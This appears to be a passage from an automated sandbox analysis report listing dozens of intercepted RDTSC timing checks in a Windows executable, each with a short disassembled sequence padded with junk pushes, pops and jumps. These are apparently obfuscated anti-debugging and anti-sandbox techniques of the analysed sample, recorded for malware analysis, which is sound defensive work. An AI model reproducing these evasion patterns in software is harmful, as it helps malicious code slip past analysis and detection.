              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33DE98 second address: 33DE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33DE9C second address: 33DEA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3420FF second address: 34212D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503255h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F80AC503255h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34212D second address: 342141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F80ACC6677Dh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343DD8 second address: 343E12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503255h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F80AC503252h 0x00000010 jbe 00007F80AC50324Ch 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d jl 00007F80AC503246h 0x00000023 pop edi 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343E12 second address: 343E2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F80ACC6677Ch 0x00000008 jo 00007F80ACC66776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F80ACC66776h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343E2E second address: 343E34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343E34 second address: 343E3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80ACC6677Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343F89 second address: 343F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F80AC503246h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3496A4 second address: 3496BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F80ACC6677Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9F12 second address: 2D9F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503253h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F80AC503258h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F80AC503253h 0x00000015 push esi 0x00000016 je 00007F80AC503246h 0x0000001c pushad 0x0000001d popad 0x0000001e pop esi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9F63 second address: 2D9F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F80ACC66776h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F80ACC66787h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 348BCF second address: 348BE2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F80AC503246h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 348BE2 second address: 348BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 348BE8 second address: 348C0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F80AC503246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F80AC503252h 0x00000010 pop ecx 0x00000011 ja 00007F80AC50324Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 348F38 second address: 348F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3490AD second address: 3490E5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F80AC503246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F80AC503257h 0x00000010 jmp 00007F80AC503254h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3490E5 second address: 3490FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F80ACC6677Fh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34938B second address: 34938F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349536 second address: 349540 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F80ACC66776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1C71 second address: 2D1C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1C7A second address: 2D1C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1C7E second address: 2D1C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1C8B second address: 2D1C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1C8F second address: 2D1C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1C93 second address: 2D1CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80ACC66782h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351E06 second address: 351E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351E0C second address: 351E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35210B second address: 352118 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352118 second address: 35212A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F80ACC6677Ch 0x0000000c jg 00007F80ACC66776h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35212A second address: 352131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3525E2 second address: 3525EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F80ACC6677Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352882 second address: 352899 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007F80AC503246h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F80AC503246h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3529F0 second address: 3529F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334034 second address: 33403A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352E37 second address: 352E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F80ACC6677Eh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351B03 second address: 351B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351B07 second address: 351B11 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33403A second address: 33403F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0949 second address: 2E0964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66783h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0964 second address: 2E096A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E096A second address: 2E096F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357AD6 second address: 357AF3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F80AC503250h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357AF3 second address: 357B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F80ACC66789h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357B13 second address: 357B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3581E8 second address: 358210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66784h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F80ACC6677Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 358210 second address: 358236 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 jmp 00007F80AC503256h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 358236 second address: 358242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F80ACC66776h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3584FB second address: 358501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BE26 second address: 35BE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BE2D second address: 35BE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 360030 second address: 360050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F80ACC66788h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EEE2 second address: 35EEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EEE8 second address: 35EEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EEEE second address: 35EF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F80AC503253h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EBB3 second address: 31EBBD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EBBD second address: 31EBF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503253h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F80AC503259h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EBF1 second address: 31EBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED18 second address: 31ED1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED1E second address: 31ED33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F80ACC66778h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED33 second address: 31ED39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED39 second address: 31ED71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F80ACC6677Dh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 je 00007F80ACC6677Ch 0x0000001a jng 00007F80ACC66776h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F80ACC6677Eh 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED71 second address: 31ED75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED75 second address: 31ED94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80ACC66781h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED94 second address: 31ED9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ED9E second address: 31EDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EDA2 second address: 31EDA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EDA6 second address: 31EDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F80ACC66778h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push edi 0x00000023 adc edx, 13871A70h 0x00000029 pop ecx 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d mov edx, eax 0x0000002f popad 0x00000030 push C91C4C89h 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 jnl 00007F80ACC66776h 0x0000003e pop ecx 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EDE8 second address: 31EDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F80AC503246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EDF2 second address: 31EDF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EEF0 second address: 31EF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], esi 0x0000000a sbb dx, 7362h 0x0000000f nop 0x00000010 jng 00007F80AC503250h 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F1C2 second address: 31F1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F1C6 second address: 31F20A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503256h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F80AC50324Eh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 cmc 0x00000013 push 00000004h 0x00000015 add edi, dword ptr [ebp+12460A1Ch] 0x0000001b nop 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F80AC50324Bh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31FA5B second address: 31FA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31FA5F second address: 31FA65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31FA65 second address: 31FA6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31FA6C second address: 31FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a ja 00007F80AC50324Ah 0x00000010 lea eax, dword ptr [ebp+12495436h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F80AC503248h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 nop 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 pop eax 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31FAAC second address: 2FEC3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F80ACC66786h 0x0000000e popad 0x0000000f push eax 0x00000010 jc 00007F80ACC6678Ch 0x00000016 jmp 00007F80ACC66786h 0x0000001b nop 0x0000001c mov edx, 76D6DD18h 0x00000021 lea eax, dword ptr [ebp+124953F2h] 0x00000027 xor dword ptr [ebp+122D2C0Dh], ecx 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 jnp 00007F80ACC6678Dh 0x00000036 jmp 00007F80ACC66787h 0x0000003b mov dword ptr [esp], eax 0x0000003e call dword ptr [ebp+122D2CA4h] 0x00000044 jmp 00007F80ACC6677Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007F80ACC66782h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F388 second address: 35F38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F38E second address: 35F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F394 second address: 35F39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F5D3 second address: 35F5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F5D9 second address: 35F5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F80AC50324Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F744 second address: 35F74E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80ACC66776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F74E second address: 35F780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F80AC50324Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F80AC503258h 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F780 second address: 35F785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F9CB second address: 35F9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F9CF second address: 35F9D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F9D3 second address: 35F9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F80AC503246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F9E6 second address: 35FA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80ACC66787h 0x00000009 popad 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80ACC66781h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35FB67 second address: 35FB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3626F4 second address: 3626F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
